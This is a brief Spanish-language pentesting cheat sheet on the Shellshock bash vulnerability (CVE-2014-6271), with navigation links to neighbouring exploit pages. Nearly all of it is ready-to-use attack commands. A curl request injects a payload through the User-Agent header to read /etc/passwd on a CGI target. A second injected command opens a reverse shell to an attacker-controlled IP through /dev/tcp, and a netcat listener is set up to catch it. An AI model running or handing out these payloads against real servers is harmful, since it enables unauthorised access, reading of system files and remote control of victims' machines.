Shellshock / Bashdoor (CVE-2014-6271)

Verificación de vulnerabilidad Shellshock / Bashdoor.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<target>/cgi-bin/<vulnerable>

Reverse shell.

# Máquina atacante
nc -lvnp <listen-port>
# Máquina victima
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" http://<target>/cgi-bin/<vulnerable>

AnteriorHeartbleed (CVE-2014-0160)SiguienteEternalBlue (CVE-2017-0144 / MS17-010)

Última actualización hace 1 año